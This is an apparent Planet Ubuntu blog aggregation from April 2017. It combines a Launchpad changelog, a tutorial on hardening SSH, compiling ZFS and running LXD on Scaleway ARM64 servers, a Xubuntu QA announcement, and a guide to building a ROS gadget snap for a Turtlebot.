April 28, 2017

Ubuntu developers

Launchpad News: Launchpad news, November 2015 – April 2017

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.

Answers

  • Lock down question title and description edits from random users
  • Prevent answer contacts from editing question titles and descriptions
  • Prevent answer contacts from editing FAQs

Blueprints

  • Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
  • Add sprint deletion support (#2888)
  • Restrict blueprint count on front page to public blueprints

Build farm

  • Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
  • Try to load the nbd module when starting launchpad-buildd (#1531171)
  • Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
  • Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
  • Always decode build logtail as UTF-8 rather than guessing (#1585324)
  • Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
  • Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)

Bugs

  • Use standard milestone ordering for bug task milestone choices (#1512213)
  • Make bug activity records visible to anonymous API requests where appropriate (#991079)
  • Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
  • Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
  • Add basic GitHub bug linking (#848666)
  • Prevent rendering of private team names in bugs feed (#1592186)
  • Update CVE database XML namespace to match current file on cve.mitre.org
  • Fix Bugzilla bug watches to support new versions that permit multiple aliases
  • Sort bug tasks related to distribution series by series version rather than series name (#1681899)

Code

  • Remove always-empty portlet from Person:+branches (#1511559)
  • Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
  • Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
  • Handle prerequisites in Git-based merge proposals (#1489839)
  • Fix OOPS when trying to register a Git merge with a target path but no target repository
  • Show an “Updating repository…” indication when there are pending writes
  • Launchpad’s Git hosting backend is now self-hosted
  • Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
  • Add “Configure Code” link to Product:+git
  • Fix Git diff generation crash on non-ASCII conflicts (#1531051)
  • Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
  • Add support for Git recipes (#1453022)
  • Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
  • Fix shallow git clones over HTTPS (#1547141)
  • Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
  • Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
  • Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
  • Show recent commits on GitRef:+index
  • Show associated merge proposals in Git commit listings
  • Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
  • Implement AJAX revision diffs for Git
  • Fix scanning branches with ghost revisions in their ancestry (#1587948)
  • Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
  • Fix linkification of references to Git repositories (#1467975)
  • Fix +edit-status for Git merge proposals (#1538355)
  • Include username in git+ssh URLs (#1600055)
  • Allow linking bugs to Git-based merge proposals (#1492926)
  • Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
  • Link to the default git repository on Product:+index (#1576494)
  • Add Git-to-Git code imports (#1469459)
  • Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
  • Export GitRepository.getRefByPath (#1654537)
  • Add GitRepository.rescan method, useful in cases when a scan crashed

Infrastructure

  • Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
  • Make cross-referencing code more efficient for large numbers of IDs (#1520281)
  • Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
  • Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
  • Document the standard DELETE method in the apidoc (#753334)
  • Add a PLACEHOLDER account type for use by SSO-only accounts
  • Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
  • Allow managing SSH keys in SSO
  • Re-raise unexpected HTTP errors when talking to the GPG key server
  • Ensure that the production dump is usable before destroying staging
  • Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
  • Fix the librarian to fsync new files and their parent directories
  • Handle running Launchpad from a Git working tree
  • Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
  • Fix delete_unwanted_swift_files to not crash on segments (#1642411)
  • Update database schema for PostgreSQL 9.5 and 9.6
  • Check fingerprints of keys received from the keyserver rather than trusting it implicitly

Registry

  • Make public SSH key records visible to anonymous API requests (#1014996)
  • Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
  • Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
  • Let latest questions, specifications and products be efficiently calculated
  • Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
  • Fix misleading messages when joining a delegated team
  • Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
  • Don’t limit Person:+related-projects to a single batch

Snappy

  • Add webhook support for snaps (#1535826)
  • Allow deleting snaps even if they have builds
  • Provide snap builds with a proxy so that they can access external network resources
  • Add support for automatically uploading snap builds to the store (#1572605)
  • Update latest snap builds table via AJAX
  • Add option to trigger snap builds when top-level branch changes (#1593359)
  • Add processor selection in new snap form
  • Add option to automatically release snap builds to store channels after upload (#1597819)
  • Allow manually uploading a completed snap build to the store
  • Upload *.manifest files from builders as well as *.snap (#1608432)
  • Send an email notification for general snap store upload failures (#1632299)
  • Allow building snaps from an external Git repository
  • Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
  • Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
  • Add support for building snaps with classic confinement (#1650946)
  • Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
  • Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

  • Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
  • Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
  • Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
  • Fix handling of << and >> dep-waits
  • Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
  • Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
  • Include DEP-11 metadata in Release file if it is present
  • Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
  • Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
  • Make index compression types configurable per-series, and add xz support (#1517510)
  • Use SHA-512 digests for GPG signing where possible (#1556666)
  • Re-sign PPAs with SHA-512
  • Publish by-hash index files (#1430011)
  • Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
  • Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
  • Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
  • Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
  • Handle original tarball signatures in source packages (#1587667)
  • Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
  • Add support for named authentication tokens for private PPAs
  • Show explicit add-apt-repository command on Archive:+index (#1547343)
  • Use a per-archive OOPS timeline in archivepublisher scripts
  • Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
  • Fix RepositoryIndexFile to gzip without timestamps
  • Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
  • Include the package name in package copy job OOPS reports and emails (#1618133)
  • Remove headers from Contents files (#1638219)
  • Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
  • Accept .debs containing control.tar.xz (#1640280)
  • Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
  • Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
  • Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
  • Store uploaded .buildinfo files (#1657704)

Translations

  • Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)

Miscellaneous

  • Use gender-neutral pronouns where appropriate
  • Self-host the Ubuntu webfonts (#1521472)
  • Make the beta and privacy banners float over the rest of the page when scrolling
  • Upgrade to pytz 2016.4 (#1589111)
  • Publish Launchpad’s code revision in an X-Launchpad-Revision header
  • Truncate large picker search results rather than refusing to display anything (#893796)
  • Sync up the lists footer with the main webapp footer a bit (#1679093)

28 April, 2017 02:08PM

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).

But can you run LXD on them? Let’s see.

Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.

They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.

It takes under a minute to provision and boot the server.

Connecting to the server

It runs Linux 4.9.23. The disk appears as vda, specifically /dev/vda; that is, there is no partitioning, and the filesystem takes over the whole device.

Checking /proc/cpuinfo and uname -a shows the two cores (of the 48 on the board) provided by KVM. The BogoMIPS figures are truly bogus on these platforms, so do not take them at face value.

Currently, Scaleway does not run its own mirror of the distribution packages but uses ports.ubuntu.com, which is about 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to differ. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster; at other locations (in a different country) it could be the other way round.

Looking at /var/log/auth.log, there are already some attackers trying to brute-force SSH. They have been trying the username ubnt. Note to self: do not use ubnt as the username for the non-root account.
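
If you are curious, here is a quick sketch to count failed logins per attempted username (the log path and the grep/awk patterns are mine, assuming the standard Ubuntu sshd log format):

```shell
# Count failed SSH logins per attempted username (standard Ubuntu log path assumed).
grep 'Failed password' /var/log/auth.log \
  | grep -o 'for \(invalid user \)\?[^ ]*' \
  | awk '{print $NF}' | sort | uniq -c | sort -rn | head
```

On a freshly exposed server, expect ubnt and root near the top of that list.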

The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this in /etc/ssh/sshd_config so that it looks like

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

Originally, the setting was commented out and defaulted to yes.
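
If you prefer to script the change, a one-liner sketch with GNU sed (the file-existence guard just makes the snippet safe to paste anywhere):

```shell
# Turn "#PasswordAuthentication yes" (or an explicit yes) into an explicit no.
if [ -f /etc/ssh/sshd_config ]; then
  sed -i 's/^#\?PasswordAuthentication .*/PasswordAuthentication no/' /etc/ssh/sshd_config
fi
```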

Finally, run

sudo systemctl reload sshd

Reloading will not break your existing SSH session (even restarting sshd will not break it, how cool is that?). Now you can create your non-root account. To let that user sudo to root, run usermod -a -G sudo myusername.

There is a recovery console, accessible through the Web management screen. For this to work, it says that “You must first login and set a password via SSH to use this serial console”. In reality, the root account already has a password set, and it is stored in /root/.pw. It is not known how strong this password is. Therefore, when you boot a cloud server on Scaleway:

  1. Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
  2. Change the root password so that it is not the one found at /root/.pw. Store that password somewhere safe, because it is needed if you want to connect through the recovery console.
  3. Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with a username other than ubnt.

Setting up ZFS support

The Ubuntu Linux kernels at Scaleway do not have ZFS support, so you need to compile ZFS as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.

Actually, those instructions are apparently obsolete for newer versions of the Linux kernel; you need to compile both spl and zfs manually, and install them.

Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, the spl and zfs build systems first create .rpm packages and then call alien to convert them to .deb packages. Here we hit an alien bug (no pun intended) which gives the error “zfs- is for architecture aarch64 ; the package cannot be built on this system”, which is weird since we are working on aarch64 in the first place.

The running Linux kernel on Scaleway for these ARM64 SoCs has its important build files at http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/

Therefore, run as root the following:

# Determine versions
arch="$(uname -m)"
release="$(uname -r)"        # e.g. 4.9.23-std-1
upstream="${release%%-*}"    # upstream kernel version, e.g. 4.9.23
local="${release#*-}"        # local version suffix, e.g. std-1

# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz" "https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}" "/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config" "http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf 'CONFIG_LOCALVERSION="%s"\n' "${local:+-$local}" >> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-
cd spl-
./configure      # Takes about 2 minutes
make             # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
tar xvfa zfs-
cd zfs-
./configure      # Takes about 6:10 minutes
make             # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
modprobe zfs
zfs list
zpool list

And that’s it! The last two commands will show that there are no datasets or pools available (yet), which means that it all works.

Setting up LXD

We are going to use a file (with ZFS) as the storage backend. Let’s check how much space we have left for it (of the 50GB disk):

root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /

Initially, only 800MB was used; now it is 2GB. Let’s allocate 30GB for LXD.
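
If you would rather derive the size from the actual free space instead of hard-coding 30GB, here is a small sketch (the 10GB margin for the host is an arbitrary choice of mine):

```shell
# Suggest a loop-device size from the free space on /, keeping a 10GB margin.
avail_gb="$(df -BG --output=avail / | tail -n 1 | tr -dc '0-9')"
echo "Available: ${avail_gb}GB; suggested LXD loop size: $(( avail_gb - 10 ))GB"
```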

LXD is not preinstalled on the Scaleway image (some other VPS providers already have LXD installed). Therefore,

apt install lxd

Then we can run lxd init. There is a weird delay the first time you run it: it takes 1:42 minutes before the first question (choice of storage backend, etc.) appears. On subsequent runs, the first question appears at once. lxd init clearly does quite a bit of work on its first run; I did not look into what exactly.

root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]: 
Create a new ZFS pool (yes/no) [default=yes]? 
Name of the new ZFS pool [default=lxd]: 
Would you like to use an existing block device (yes/no) [default=no]? 
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]? 
Do you want to configure the LXD bridge (yes/no) [default=yes]? 
Warning: Stopping lxd.service, but it can still be activated by:

LXD has been successfully configured.

Now, let’s run lxc list. The first run creates the client certificate. There is quite a bit of cryptography going on, and it takes a long time.

ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04


real    5m25.717s
user    5m25.460s
sys    0m0.372s

It is weird and warrants closer examination. In any case, let’s check the available entropy:

ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail

Creating containers

Let’s create a container. We will do one step at a time, in order to measure how long each takes.

ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s

Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.

Let’s see how long it takes to launch a container.

ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s

What this means is that the Scaleway Linux kernel does not have all the AppArmor (“aa”) features that LXD requires. If we want to continue, we must explicitly configure the container to accept this situation.

What features are missing?

ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default


            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.


There are two hints here: an issue with process_label_set, and another with get_cgroup.

Let’s allow it for now and start the container:

ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
| c1   | RUNNING |      |      | PERSISTENT | 0         |
ubuntu@scw-ubuntu-arm64:~$ lxc list
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
| c1   | RUNNING | (eth0) |      | PERSISTENT | 0         |

Let’s run nginx in the container.

ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl
<!DOCTYPE html>
<title>Welcome to nginx!</title>

That’s it! We are running LXD on Scaleway’s new ARM64 servers. The issues above should be fixed in order to provide a nicer user experience.

28 April, 2017 01:12PM

April 27, 2017

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish]

In my first videopodcast, the topic is a meaty one: Ubuntu kills Unity and the phone.

Link to the videopodcast. Link to the podcast (audio only).

27 April, 2017 09:04PM by Marcos Costales (noreply@blogger.com)

Xubuntu: Xubuntu Quality Assurance team is spreading out

Up until the start of the 17.04 cycle, the Xubuntu Quality Assurance team had been led by one person. During the last cycle, that person needed a break. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.

Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.

While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue roughly this split: Dave will run the daily Xubuntu QA, and Kev will focus more on QA for Xfce. Most of you are unlikely to see much change, given that we are largely quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.

While it is obvious to most that there are deep connections between Xubuntu and Xfce, we hope that this change will bring more targeted testing of the new GTK3 Xfce packages. You will start to see more calls for testing of packages on the Xubuntu development mailing list before they reach Xubuntu. Case in point: the recent requests for people to test Thunar and patches direct from the Xfce Git repositories – though up until now these have come via Launchpad bug reports.

On a positive note, this change has been possible solely because of the creation of the Xubuntu QA Launchpad team some cycles ago, set up specifically to allow people from the community to be brought into the Xubuntu setup and from there become members of the Xubuntu team itself. People do get noticed on the tracker, and they do get noticed on our IRC channels. Our hope is to grow Xubuntu QA beyond the few people we currently have; more people involved directly increases the quality and strength of the team.

27 April, 2017 04:44PM

Ubuntu Insights: ROS production: obtaining confined access to the Turtlebot [4/5]

This is a guest post by Kyle Fazzari, Software Engineer. If you would like to contribute a guest post, please contact ubuntu-devices@canonical.com

This is the fourth blog post in this series about ROS production. In the previous post we created a snap of our prototype, and released it into the store. In this post, we’re going to work toward an Ubuntu Core image by creating what’s called a gadget snap. A gadget snap contains information such as the bootloader bits, filesystem layout, etc., and is specific to the piece of hardware running Ubuntu Core. We don’t need anything special in that regard (read that link if you do), but the gadget snap is also currently the only place on Ubuntu Core and snaps in general where we can specify our udev symlink rule in order to obtain confined access to our Turtlebot (i.e. allow our snap to be installable and workable without devmode). Eventually there will be a way to do this without requiring a custom gadget, but this is how it’s done today.

Alright, let’s get started. Remember that this is also a video series: feel free to watch the video version of this post:

Step 1: Start with an existing gadget

Canonical publishes gadget snaps for all reference devices, including generic amd64, i386, as well as the Raspberry Pi 2 and 3, and the DragonBoard 410c. If the computer on which you’re going to install Ubuntu Core is among these, you can start with a fork of the corresponding official gadget snap maintained in the github.com/snapcore organization. Since I’m using a NUC, I’ll start with a fork of pc-amd64-gadget (my finished gadget is available for reference, and here’s one for the DragonBoard). If you’re using a different reference device, fork that gadget and you can still follow the rest of these steps.

Step 2: Select a name for your gadget snap

Open the snapcraft.yaml included in your gadget snap fork. You’ll see the same metadata we discussed in the previous post. Since snap names are globally unique, you need to decide on a different name for your gadget. For example, I selected pc-turtlebot-kyrofa. Once you settle on one, register it:

$ snapcraft register my-gadget-snap-name

If the registration succeeded, change the snapcraft.yaml to reflect the new name. You can also update the summary, description, and version as necessary.

Step 3: Add the required udev rule

If you’ll recall, back in the second post in this series, we installed a udev rule to ensure that the Turtlebot showed up at /dev/kobuki. Take a look at that rule:

$ cat /etc/udev/rules.d/57-kobuki.rules
# On precise, for some reason, USER and GROUP are getting ignored.
# So setting mode = 0666 for now.
SUBSYSTEM=="tty", ATTRS{idVendor}=="0403", ATTRS{idProduct}=="6001", ATTRS{serial}=="kobuki*", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"
# Bluetooth module (currently not supported and may have problems)
# SUBSYSTEM=="tty", ATTRS{address}=="00:00:00:41:48:22", MODE:="0666", GROUP:="dialout", SYMLINK+="kobuki"

It’s outside the scope of this series to explain udev in depth, but the two highlighted values (idVendor 0403 and idProduct 6001) are how the Kobuki base is uniquely identified. We’re going to write the snapd version of this rule, using the same values. At the end of the gadget’s snapcraft.yaml, add the following slot definition:

# Custom serial-port interface for the Turtlebot 2
slots:
  kobuki:
    interface: serial-port
    path: /dev/serial-port-kobuki
    usb-vendor: 0x0403
    usb-product: 0x6001

The name of the slot being defined is kobuki. The symlink path we’re requesting is /dev/serial-port-kobuki. Why not /dev/kobuki? Because snapd only supports namespaced serial port symlinks to avoid conflicts. You can use whatever you like for this path (and the slot name), but make sure to follow the /dev/serial-port-<whatever> pattern, and adjust the rest of the directions in this series accordingly.
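
Since getting the naming pattern wrong is an easy mistake, here is a trivial sketch (my own check, not something snapd provides) to sanity-check a candidate path:

```shell
# Validate a proposed symlink path against the /dev/serial-port-<name> pattern.
path="/dev/serial-port-kobuki"
case "$path" in
  /dev/serial-port-?*) echo "ok: $path" ;;
  *) echo "bad: $path does not match /dev/serial-port-<name>" ;;
esac
```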

Step 4: Build the gadget snap

This step is easy. Just get into the gadget snap directory and run:

$ snapcraft

In the end, you’ll have a gadget snap.

Step 5: Put the gadget snap in the store

You don’t technically need the gadget snap in the store just to create an image, but there are two reasons you will want it there:

  1. Without putting it in the store you have no way of updating it in the future
  2. Without putting it in the store it’s impossible for the serial-port interface we just added to be automatically connected to the snap that needs it, which means the image won’t make the robot move out of the box

Since you’ve already registered the snap name, just push it up (we want our image based on the stable channel, so let’s release into that):

$ snapcraft push /path/to/my/gadget.snap --release=stable

You will in all likelihood receive an error saying it’s been queued for manual review since it’s a gadget snap. It’s true, right now gadget snaps require manual review (although that will change soon). You’ll need to wait for this review to complete successfully before you can take advantage of it actually being in the store (make a post in the store category of the forum if it takes longer than you expect), but you can continue following this series while you wait. I’ll highlight things you’ll need to do differently if your gadget snap isn’t yet available in the store.

Step 6: Adjust our ROS snap to run under strict confinement

As you’ll remember, our ROS snap currently only runs with devmode, and still assumes the Turtlebot is available at /dev/kobuki. We know now that our gadget snap will make the Turtlebot available via a slot at /dev/serial-port-kobuki, so we need to alter our snap slightly to account for this. Fortunately, when we initially created the prototype, we made the serial port configurable. Good call on that! Let’s edit our snapcraft.yaml a bit:

name: my-turtlebot-snap
version: '0.2'
summary: Turtlebot ROS Demo
description: |
  Demo of Turtlebot randomly wandering around, avoiding obstacles and cliffs.

grade: stable

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

parts:
  prototype:  # part name is arbitrary; use whatever you chose in version 0.1
    plugin: catkin
    rosdistro: kinetic
    catkin-packages: [prototype]

plugs:
  kobuki:
    interface: serial-port

apps:
  system:  # app name is arbitrary; use whatever you chose in version 0.1
    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Most of this is unchanged from version 0.1 of our snap that we discussed in the previous post. I’ve made the relevant sections bold; let’s cover them individually.

version: 0.2

We’re modifying the snap here, so I suggest changing the version. This isn’t required (the version field is only for human consumption, it’s not used to determine which snap is newest), but it certainly makes support easier (“what version of the snap are you on?”).

# Using strict confinement here, but that only works if installed
# on an image that exposes /dev/serial-port-kobuki via the gadget.
confinement: strict

You wrote such a nice comment, it hardly needs more explanation. The point is, now that we have a gadget that makes this device accessible, we can switch to using strict confinement.

plugs:
  kobuki:
    interface: serial-port

This one defines a new plug in this snap, but then says “the kobuki plug is just a serial-port plug.” This is optional, but it’s handy to have our plug named kobuki instead of the more generic serial-port. If you opt to leave this off, keep it in mind for the following section.

    command: roslaunch prototype prototype.launch device_port:=/dev/serial-port-kobuki --screen
    plugs: [network, network-bind, kobuki]
    daemon: simple

Here we take advantage of the flexibility we introduced in the second post of the series, and specify that our launch file should be launched with device_port set to the udev symlink defined by the gadget instead of the default /dev/kobuki. We also specify that this app should utilize the kobuki plug defined directly above it, which grants it confined access to the serial port.

Rebuild your snap, and release the updated version into the store as we covered in part 3, but now you can release to the stable channel. Note that this isn’t required, but the reasons for putting this snap in the store are the same as the reasons for putting the gadget in the store (namely, updatability and interface auto-connection).

In the next (and final) post in this series, we’ll put all these pieces together and create an Ubuntu Core image that is ready for the factory.

27 April, 2017 02:33PM

Ubuntu Podcast from the UK LoCo: S10E08 – Rotten Hospitable Statement - Ubuntu Podcast

We discuss what is going on over at System76 with Emma Marshall, help protect your bits with some Virtual Private Love and go over your feedback.

It’s Season Ten Episode Eight of the Ubuntu Podcast! Alan Pope, Mark Johnson, Martin Wimpress and Emma Marshall are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

27 April, 2017 02:00PM

hackergotchi for ArcheOS


ArcheOS Hypatia and Archeorobotics: ROS for 3D dynamic documentations

Dynamic 3D documentation is a technique we are using more and more in professional archaeology. It can be useful to map in a very fast way any kind of earth-moving work during negative archaeological controls (from wide open area to small trenches, like we did here) or to record in real-time archaeological evidences and layers during a normal excavation (like the video below).

